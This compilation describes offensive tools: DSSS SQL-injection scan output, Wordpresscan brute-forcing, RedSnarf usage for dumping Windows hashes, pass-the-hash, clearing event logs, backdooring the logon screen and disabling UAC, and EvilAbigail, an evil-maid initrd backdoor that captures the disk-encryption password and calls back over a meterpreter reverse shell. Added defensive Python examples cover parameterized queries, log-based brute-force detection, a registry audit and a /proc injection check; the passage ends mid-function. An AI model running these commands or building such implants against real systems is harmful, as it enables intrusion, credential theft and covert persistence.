* scanning GET parameter 'artist'
(i) GET parameter 'artist' could be error SQLi vulnerable (MySQL)
(i) GET parameter 'artist' appears to be blind SQLi vulnerable (e.g.: 'http://testphp.vulnweb.com/artists.php?artist=1%20AND%2061%3E60')

scan results: possible vulnerabilities found
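The sample run above reports two findings: an error-based one (a database error surfaces) and a blind one (a true tautology such as 1 AND 61>60 and a false one produce different pages). The added example below, which is not DSSS code, shows why both signals exist and why a parameterized query removes them. It uses an in-memory SQLite table named artists constructed for the example; the two lookup functions and the probes are assumptions written to mirror the scanner's logic, with the probes run locally against both query styles.

```python
import sqlite3

def _make_db():
    """Constructed sample: an 'artists' page that looks a record up by numeric id."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)", [(1, "Alice"), (2, "Bob")])
    return conn

def lookup_vulnerable(conn, artist_param):
    """The injectable pattern: the request parameter is concatenated into SQL text."""
    sql = "SELECT name FROM artists WHERE id = " + artist_param
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn, artist_param):
    """The fix: the parameter is bound as a value and never parsed as SQL.
    A non-numeric value simply matches nothing (or is rejected by validation up front)."""
    sql = "SELECT name FROM artists WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (artist_param,))]

def boolean_probe(lookup, conn, base="1"):
    """Blind (boolean-based) check: a true and a false tautology are appended to the
    legitimate value. Returns True when the two results differ, i.e. the database
    evaluated the injected condition."""
    r_true = lookup(conn, base + " AND 61>60")
    r_false = lookup(conn, base + " AND 61>62")
    return r_true != r_false

def error_probe(lookup, conn, base="1"):
    """Error-based check: an unbalanced quote breaks the query only when the
    parameter is spliced into SQL text."""
    try:
        lookup(conn, base + "'")
    except sqlite3.Error:
        return True
    return False

if __name__ == "__main__":
    conn = _make_db()
    for name, fn in (("concatenated", lookup_vulnerable), ("parameterized", lookup_parameterized)):
        print(name, "boolean:", boolean_probe(fn, conn), "error:", error_probe(fn, conn))
```

With the bound parameter, "1 AND 61>60" and "1 AND 61>62" are both just text that matches no integer id, so the two responses are identical and the error probe raises nothing; that identical behaviour on true and false conditions is exactly what a scanner like DSSS needs to see before it stops reporting the parameter.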

Requirements
Python version 2.6.x or 2.7.x is required for running this program.


Wordpresscan - WPScan rewritten in Python + some WPSeku ideas


A simple WordPress scanner written in Python, based on the work of WPScan (Ruby version).

Install & Launch
Dependencies
pip install requests
pip install tornado
Install
git clone https://github.com/swisskyrepo/Wordpresscan.git
cd Wordpresscan
Example 1 : Basic update and scan of a wordpress
python main.py -u "http://localhost/wordpress" --update --random-agent

-u : Url of the WordPress
--update : Update the wpscan database
--aggressive : Launch an aggressive version to scan for plugins/themes
--random-agent : Use a random user-agent for this session
Example 2 : Basic bruteforce (option --brute, option --nocheck)
python main.py -u "http://127.0.0.1/wordpress/" --brute fuzz/wordlist.lst
python main.py -u "http://127.0.0.1/wordpress/" --brute admin

--brute file.lst : Will bruteforce every username and their password
--brute username : Will bruteforce the password for the given username
it will also try to bruteforce the password for the detected users.


python main.py -u "http://127.0.0.1/wordpress/" --brute fuzz/wordlist.lst --nocheck
_______________________________________________________________
_ _ _
| | | | | |
| | | | ___ _ __ __| |_ __ _ __ ___ ___ ___ ___ __ _ _ __
| |/\| |/ _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|/ __/ _` | '_ \
\ /\ / (_) | | | (_| | |_) | | | __/\__ \__ \ (_| (_| | | | |
\/ \/ \___/|_| \__,_| .__/|_| \___||___/___/\___\__,_|_| |_|
| |
|_|
WordPress scanner based on wpscan work - @pentest_swissky
_______________________________________________________________
[+] URL: http://127.0.0.1/wordpress/

[!] The Wordpress 'http://127.0.0.1/wordpress/readme.html' file exposing a version number: 4.4.7
[i] Uploads directory has directory listing enabled : http://127.0.0.1/wordpress/wp-content/uploads/
[i] Includes directory has directory listing enabled : http://127.0.0.1/wordpress/wp-includes/

[i] Bruteforcing all users
[+] User found admin
[+] Starting passwords bruteforce for admin
Bruteforcing - ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
Example 3 : Thinking is overrated, this is aggressive, mostly not advised!
python main.py -u "http://127.0.0.1/wordpress/" --fuzz

[i] Enumerating components from aggressive fuzzing ...
[i] File: http://127.0.0.1/wordpress/license.txt - found
[i] File: http://127.0.0.1/wordpress/readme.html - found
[i] File: http://127.0.0.1/wordpress/wp-admin/admin-footer.php - found
[i] File: http://127.0.0.1/wordpress/wp-admin/css/ - found
[i] File: http://127.0.0.1/wordpress/wp-admin/admin-ajax.php - found
[i] File: http://127.0.0.1/wordpress/wp-activate.php - found
--fuzz : Will fuzz the website in order to detect as much file, themes and plugins as possible
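From the defender's side, the runs above leave a recognisable trail in the web server's access log: a burst of POST requests to wp-login.php from one client, and successful GETs of readme.html, license.txt and the directory listings. The following added example (not part of Wordpresscan) parses combined-format access-log lines and flags both patterns; the log lines, the client addresses and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]   # drop any query string
    return rec

def detect_login_bruteforce(lines, threshold=10, window_seconds=60):
    """Map client IP -> peak number of POST /wp-login.php requests seen inside any
    window_seconds span, for clients that reached the threshold."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in posts.items():
        stamps.sort()
        peak, left = 0, 0
        for right, ts in enumerate(stamps):          # sliding window over sorted timestamps
            while (ts - stamps[left]).total_seconds() > window_seconds:
                left += 1
            peak = max(peak, right - left + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

# Paths the scanner output above reports; each is a fingerprinting or listing exposure.
EXPOSURE_PATHS = ("/readme.html", "/license.txt", "/wp-content/uploads/", "/wp-includes/")

def detect_exposures(lines):
    """Return {path: set(ips)} for successful (2xx) GETs of the fingerprinting paths."""
    hits = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and 200 <= rec["status"] < 300:
            for p in EXPOSURE_PATHS:
                if rec["path"].endswith(p):
                    hits[p].add(rec["ip"])
    return dict(hits)

# Constructed sample log: one client hammering the login form, one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2017:13:55:%02d +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 3156 "-" "Mozilla/5.0"' % s
    for s in range(0, 36, 3)                        # 12 POSTs in 33 seconds
] + [
    '198.51.100.9 - - [10/Oct/2017:13:56:10 +0000] "GET /wordpress/readme.html HTTP/1.1" 200 7413 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2017:13:56:12 +0000] "GET /wordpress/wp-content/uploads/ HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2017:13:57:00 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(detect_login_bruteforce(SAMPLE_LOG))
    print(detect_exposures(SAMPLE_LOG))
```

The exposure check doubles as a self-audit: if your own IP shows up under /readme.html with a 200, the file is still reachable and the version leak the scanner reports is real.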

Credits and Contributors

RedSnarf - A Pen-Testing / Red-Teaming Tool For Windows Environments


RedSnarf is a pen-testing / red-teaming tool by Ed Williams for retrieving hashes and credentials from Windows workstations, servers and domain controllers using OpSec Safe Techniques.

RedSnarf functionality includes:
  • Retrieval of local SAM hashes
  • Enumeration of user/s running with elevated system privileges and their corresponding lsa secrets password;
  • Retrieval of MS cached credentials;
  • Pass-the-hash;
  • Quickly identify weak and guessable username/password combinations (default of administrator/Password01);
  • The ability to retrieve hashes across a range;
  • Hash spraying -
  • Credsfile will accept a mix of pwdump, fgdump and plain text username and password separated by a space;
  • Lsass dump for offline analysis with Mimikatz;
  • Dumping of Domain controller hashes using NTDSUtil and retrieval of NTDS.dit for local parsing;
  • Dumping of Domain controller hashes using the drsuapi method;
  • Retrieval of Scripts and Policies folder from a Domain controller and parsing for 'password' and 'administrator';
  • Ability to decrypt cpassword hashes;
  • Ability to start a shell on a remote machine;
  • The ability to clear the event logs (application, security, setup or system); (Internal Version only)
  • Results are saved on a per-host basis for analysis.
  • Enable/Disable RDP on a remote machine.
  • Change RDP port from 3389 to 443 on a remote machine.
  • Enable/Disable NLA on a remote machine.
  • Find where users are logged in on remote machines.
  • Backdoor Windows Logon Screen
  • Enable/Disable UAC on a remote machine.
  • Stealth mimikatz added.
  • Parsing of domain hashes
  • Ability to determine which accounts are enabled/disabled
  • Take a screen shot of a Remote logged on Active Users Desktop
  • Record Remote logged on Active Users Desktop
  • Decrypt Windows CPassword
  • Decrypt WinSCP Password
  • Get User SPN's
  • Retrieve WIFI passwords from remote machines

RedSnarf Usage
Requirements:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - used with parsing Mimikatz info locally
Show Help
./redsnarf.py -h
./redsnarf.py --help

Retrieve Local Hashes
Retrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log
./redsnarf.py -H ip=10.0.0.50 -uC security

Retrieve Local Hashes from a single machine using weak local credentials and clearing the application event log
./redsnarf.py -H ip=10.0.0.50 -uC application

Retrieve Local Hashes from a single machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Retrieve Local Hashes from a single machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Retrieve Hashes across a network range using local administrator credentials
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com


Hash Spraying
Spray Hashes across a network range
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Retrieve Hashes across a network range domain login
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Quickly Check Credentials
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Quickly Check File containing usernames (-hS) and a generic password (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y


Retrieve Domain Hashes
Retrieve Hashes using drsuapi method (Quickest)
This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Retrieve Hashes using NTDSUtil
This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Golden Ticket Generation
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y


Information Gathering
Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Decrypt Cpassword
./redsnarf.py -uG cpassword

Find User - Live
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Find User - Offline (searches pre-downloaded information)
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Display NT AUTHORITY\SYSTEM Tasklist
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Screenshot the Desktop of a Remote Logged on Active User
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y


Misc
Start a Shell on a machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Start a Shell on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Run stealth mimikatz. This option starts a web server to serve a PowerShell script that is obfuscated and encoded on the machine side, so the data does not touch disk; credentials are grepped for and echoed back to the screen in an easy-to-read style.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Run Custom Command
Example 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Example 2 - Double Quotes need to be escaped with \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Local Access Token Policy
Creates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the registry and either enable or disable Local Access Token Policy settings.
./redsnarf.py -rL y

Wdigest
Enable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Disable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Query UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC
Enable UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Disable UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Query UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Backdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate
Enable Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Disable Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Query Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon
Enable Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Disable Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Query Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Lock a remote machine user session using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y


RDP
Enable RDP on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Disable RDP on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Query RDP status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Change RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Change RDP Port to default of 3389 on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Query RDP Port Value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Enable Multi-RDP with Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Enable RDP SingleSessionPerUser on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Disable RDP SingleSessionPerUser on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Query RDP SingleSessionPerUser status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q


NLA
Enable NLA on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Disable NLA on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Query NLA status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q
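Most of the -r switches above flip a single HKLM registry value (WDigest UseLogonCredential, UAC EnableLUA, the RDP enable/port/NLA/session values, Winlogon AutoAdminLogon), so the defender's counterpart is an audit that reads those values and reports any in a weakened state. The block below is an added example, not RedSnarf code: the registry paths are the standard Windows locations for those settings; the Image File Execution Options check for accessibility binaries is a general logon-screen backdoor check and is not a claim about how RedSnarf's -rB option works; the SAMPLE_* snapshots are constructed so the audit can be exercised on any platform, and read_snapshot() only does live reads on Windows.

```python
import sys

# Standard HKLM locations of the settings toggled above.
WDIGEST = r"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
POLICY_SYSTEM = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
TERMSRV = r"SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP = TERMSRV + r"\WinStations\RDP-Tcp"
WINLOGON = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
IFEO = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
# Accessibility binaries reachable from the logon screen; a Debugger value under their
# IFEO key is a classic logon-screen backdoor (general check, not tied to any one tool).
ACCESSIBILITY_EXES = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
                      "narrator.exe", "displayswitch.exe")

def audit(snapshot):
    """snapshot maps (key_path, value_name) -> data as read from HKLM.
    Returns a list of (finding_id, detail) for settings in a weakened state;
    absent values are treated as the secure default."""
    get = lambda key, name, default=None: snapshot.get((key, name), default)
    findings = []
    if get(WDIGEST, "UseLogonCredential", 0) == 1:
        findings.append(("WDIGEST_PLAINTEXT", "UseLogonCredential=1: plaintext logon credentials kept in LSASS"))
    if get(POLICY_SYSTEM, "EnableLUA", 1) == 0:
        findings.append(("UAC_DISABLED", "EnableLUA=0: UAC is off"))
    if get(TERMSRV, "fDenyTSConnections", 1) == 0:          # RDP enabled: check how
        port = get(RDP_TCP, "PortNumber", 3389)
        if port != 3389:
            findings.append(("RDP_NONDEFAULT_PORT", "RDP listening on %s, not 3389" % port))
        if get(RDP_TCP, "UserAuthentication", 1) == 0:
            findings.append(("RDP_NLA_OFF", "UserAuthentication=0: Network Level Authentication disabled"))
        if get(TERMSRV, "fSingleSessionPerUser", 1) == 0:
            findings.append(("RDP_MULTI_SESSION", "fSingleSessionPerUser=0: multiple sessions per user"))
    if str(get(WINLOGON, "AutoAdminLogon", "0")) == "1":
        detail = "AutoAdminLogon=1"
        if get(WINLOGON, "DefaultPassword"):
            detail += " with DefaultPassword stored in the registry"
        findings.append(("AUTOLOGON", detail))
    for exe in ACCESSIBILITY_EXES:
        dbg = get(IFEO + "\\" + exe, "Debugger")
        if dbg:
            findings.append(("IFEO_DEBUGGER", "%s Debugger=%s" % (exe, dbg)))
    return findings

def read_snapshot():
    """Collect the watched values from the live HKLM hive. Windows only; returns None
    elsewhere so audit() can still be run against an exported snapshot."""
    if sys.platform != "win32":
        return None
    import winreg
    wanted = [(WDIGEST, "UseLogonCredential"), (POLICY_SYSTEM, "EnableLUA"),
              (TERMSRV, "fDenyTSConnections"), (TERMSRV, "fSingleSessionPerUser"),
              (RDP_TCP, "PortNumber"), (RDP_TCP, "UserAuthentication"),
              (WINLOGON, "AutoAdminLogon"), (WINLOGON, "DefaultPassword")]
    wanted += [(IFEO + "\\" + exe, "Debugger") for exe in ACCESSIBILITY_EXES]
    snapshot = {}
    for key, name in wanted:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                snapshot[(key, name)] = winreg.QueryValueEx(k, name)[0]
        except OSError:
            pass                                    # key or value absent: default applies
    return snapshot

# Constructed snapshots: a host after the kind of changes listed above, and a clean one.
SAMPLE_WEAKENED = {
    (WDIGEST, "UseLogonCredential"): 1,
    (POLICY_SYSTEM, "EnableLUA"): 0,
    (TERMSRV, "fDenyTSConnections"): 0,
    (RDP_TCP, "PortNumber"): 443,
    (RDP_TCP, "UserAuthentication"): 0,
    (WINLOGON, "AutoAdminLogon"): "1",
    (WINLOGON, "DefaultPassword"): "example-only",
}
SAMPLE_HARDENED = {(POLICY_SYSTEM, "EnableLUA"): 1, (TERMSRV, "fDenyTSConnections"): 1}

if __name__ == "__main__":
    for fid, detail in audit(read_snapshot() or SAMPLE_WEAKENED):
        print(fid, "-", detail)
```

Run across a fleet, the same comparison against a known-good snapshot catches each of the -rW e / -rU d / -rT e / -rN d / -rA e changes as a drift event, which is a far cheaper signal than hunting for the tool itself.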



EvilAbigail - Automated Linux Evil Maid Attack

Automated Linux evil maid attack

Scenario
  • Laptop left turned off with FDE turned on
  • Attacker boots from USB/CD/Network
  • Script executes and backdoors initrd
  • User returns to laptop, boots as normal
  • Backdoored initrd loads:
    • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
    • (Fedora/CentOS) LD_PRELOAD.so into DefaultEnvironment, loaded globally, dropping a shell.

Supported Distros
  • Ubuntu 14.04.3
  • Debian 8.2.0
  • Kali 2.0
  • Fedora 23
  • CentOS 7

Current Features
  • python/meterpreter/reverse_https to compile time LHOST
  • FDE decryption password stored in meterpreter environment (getenv PASSWORD)

Details

Compiling
See the Makefile for more information/configuration. LHOST is required in the environment to build the .so, as msfvenom is piped in at compile time. It is also necessary to have libcryptsetup-dev (or equivalent) installed on the build machine.
Generic Instructions (builds iso image in cwd): LHOST=192.168.56.101 make rev.so iso

isolinux.cfg
The following options have been appended to the kernel boot:
mc superuser nodhcp quiet loglevel=0
Furthermore, the prompt value has been set to 0 to allow fully automated execution.

Timing
Approximate nefarious boot -> backdoored time: ~2 minutes
Approximate legit boot -> shell: ~90 seconds (configurable, we want networking up before us)

Prerequisites
core.d is an unpacked core.gz from TinyCore with the below packages merged in.
Core-current is an unpacked Core-current.iso
The following packages have been installed inside tinycore (python, filesystem support):
  • bzip2-lib.tcz
  • filesystems-3.16.6-tinycore.tcz
  • gdbm.tcz
  • libffi.tcz
  • mtd-3.16.6-tinycore.tcz
  • ncurses.tcz
  • openssl.tcz
  • python.tcz
  • readline.tcz
  • sqlite3.tcz

Adding new signatures
At a minimum signature is as follows:
"exampleOS" : {
"IDENTIFIER" : "grep EXAMPLEOS etc/initrd-release",
"ROOT" : "${rootmnt}",
"FILENAME" : "/ldlinux.so.1",
"INITRDFILENAME" : "hda1"
}
  • exampleOS is a unique name for this OS.
  • IDENTIFIER is a shell command that has an exit code 0 when run against the correct initrd, and !0 for anything else.
  • ROOT is the full path or variable where the new root is mounted after decryption.
  • FILENAME is the full path to drop our binary on the root fs. Take care to know what initrd mounts and what is mounted later on.
  • INITRDFILENAME is the full path of the binary inside the initrd. This is copied inside Makefile (cp ... core.d/...) so it should match that.
After that, every triple of *FILE, *PRE, *POST is run against the initrd as a re.sub (e.g. re.sub(*PRE, *POST, *FILE)). The contents of *PRE and *POST are expanded using .format(**config[detectedOS]), so feel free to expand your signature to inject items.
There is no limit to the number of replacements you can run.

Notes
  • \\1 will expand to the full contents of the match (*PRE) when used inside the replace (*POST).
  • Be careful with: | $

Nitty Gritty

Payload
The python/meterpreter/reverse_https metasploit payload was chosen because it is more platform independent than the linux/*/meterpreter/reverse_tcp payloads. Python seems to be installed by default on all the tested systems.
By default, the payload is generated at compile time and piped into the .c file as a #define. This makes iterations easier, but it shouldn't be hard to save the payload and insert it manually.

Debian based (Debian, Ubuntu, Kali)

Dropping the shell
Debian based systems (Debian, Ubuntu etc) use a standard gzipped cpio image as the initramfs. This contains the default /init script which runs through preparing the system for full boot. This includes asking the user for their password and mounting the encrypted root fs.
For dropping our .so, we wait until the root filesystem has been mounted (so after the user has been asked for their password) and copy the .so to the /dev filesystem. The /dev filesystem was chosen as it is accessible just before the rootfs is switched and it is a ram based mount. This means that our .so won't touch disk.
To actually use the dropped .so, we then use the LD_PRELOAD environment variable on the switch_root call. This variable is passed to all child executables and as such, the final /sbin/init script will have the module loaded. To keep this relatively quiet, we check if we are loaded into /sbin/init, and if so, we unset the LD_PRELOAD variable and delete the .so. This functionality can easily be disabled if we wanted to hook specific applications.
To force execution of the .so, by default after loading, we use the gcc flag -Wl,-init,shell, where shell is our main function. This specifies which function we want to call on init of the .so. Think of this as an analogue to Windows' DllMain.

Password stealing
The part of the init script in charge of asking the user for their password and mounting the root filesystem is as follows:
scripts/local-top/cryptroot:
if [ ! -e "$NEWROOT" ]; then
if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
$cryptkeyscript "$cryptkey" | $cryptcreate --key-file=- ; then
message "cryptsetup: cryptsetup failed, bad password or options?"
continue
fi
fi
The important part for us is where the output of $cryptkeyscript is piped into $cryptcreate. $cryptkeyscript is the password asker, and $cryptcreate is the disk mounter. This pipe makes it very easy for us to attack. We insert the following code where the pipe is to write out the password to the end of our .so:
(read P; echo -ne \\\\\\\\x00$P >> /OUR.SO; echo -n $P)
This will read the password into the variable $P, and both write it to the end of the .so and echo it out again. This code will be transparent for the purposes of $cryptkeyscript and $cryptcreate, but it will have the side effect of exfiltrating the password. We use \\\\\\\\x00 to prepend a null byte (accounting for many levels of shell escaping) to the password. This makes it much easier for our .so to read the password back, as it just needs to read backwards from the end of itself until it sees a null byte.
To provide this password to the attacker, it is used as an environmental variable in the invocation of the payload. This means that the attacker can just use the meterpreter command getenv PASSWORD to retrieve the password.

Artefacts
Due to the way the .so is being loaded, there will be references to it in both /proc/1/maps and /proc/1/environ.
The maps file is a list of loaded modules. The following excerpt shows the contents of this file. Note the (deleted) marker, which could potentially raise suspicion. However, unlike normal binaries, it is not possible to access the .so without directly carving it out of memory after it has been deleted.
7f9ee8a56000-7f9ee8a58000 r-xp 00000000 00:06 9264    /dev/hda1 (deleted)
7f9ee8a58000-7f9ee8c57000 ---p 00002000 00:06 9264    /dev/hda1 (deleted)
7f9ee8c57000-7f9ee8c58000 rw-p 00001000 00:06 9264    /dev/hda1 (deleted)
The environ file is a NUL-separated list of environment variables at invocation. Because it reflects the state at invocation, any modifications we make at runtime (unsetting LD_PRELOAD) will not be reflected.
In both of these cases, because we can be hooked into any and all system processes, we could just hook the read(2) function and remove any references to ourselves.
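The two artefacts just described are exactly what a host check should look for: file-backed mappings whose backing file has been unlinked, code executing from a RAM-backed mount such as /dev, and an LD_PRELOAD entry that survives in /proc/1/environ. The block below is an added example, not part of EvilAbigail; it parses the three maps lines quoted above (padded with constructed ordinary mappings for contrast) and a constructed environ blob, and scan_pid() is a convenience wrapper that needs read access to /proc/<pid>.

```python
import re

MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+) (?P<perms>[rwxps-]{4}) "
    r"(?P<offset>[0-9a-f]+) (?P<dev>[0-9a-f]+:[0-9a-f]+) (?P<inode>\d+)\s*(?P<path>.*)$"
)
# Mount points where no legitimate shared library should be executing from.
VOLATILE_PREFIXES = ("/dev/shm/", "/dev/", "/tmp/", "/var/tmp/", "/run/")

def parse_maps(text):
    """Parse /proc/<pid>/maps text into a list of dicts, one per mapping."""
    rows = []
    for line in text.splitlines():
        m = MAPS_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows

def suspicious_mappings(maps_text):
    """Return {backing_path: set(reasons)} for file-backed mappings that look like an
    injected library: the file has been unlinked, or code runs from a volatile path."""
    findings = {}
    for row in parse_maps(maps_text):
        path = row["path"]
        if not path or path.startswith("[") or row["inode"] == "0":
            continue                            # anonymous memory, [stack], [vdso] and friends
        deleted = path.endswith(" (deleted)")
        clean = path[:-len(" (deleted)")] if deleted else path
        reasons = set()
        if deleted:
            reasons.add("backing file deleted")
        if "x" in row["perms"] and clean.startswith(VOLATILE_PREFIXES):
            reasons.add("executable mapping under a RAM-backed or temporary path")
        if reasons:
            findings.setdefault(clean, set()).update(reasons)
    return findings

def ld_preload_from_environ(raw):
    """/proc/<pid>/environ is NUL-separated; return the LD_PRELOAD value or None.
    It records the environment at exec time, so unsetenv() later does not hide it."""
    for entry in raw.split(b"\0"):
        if entry.startswith(b"LD_PRELOAD="):
            return entry[len(b"LD_PRELOAD="):].decode(errors="replace")
    return None

def scan_pid(pid):
    """Live check of one process; returns (findings, ld_preload)."""
    with open("/proc/%d/maps" % pid) as f:
        findings = suspicious_mappings(f.read())
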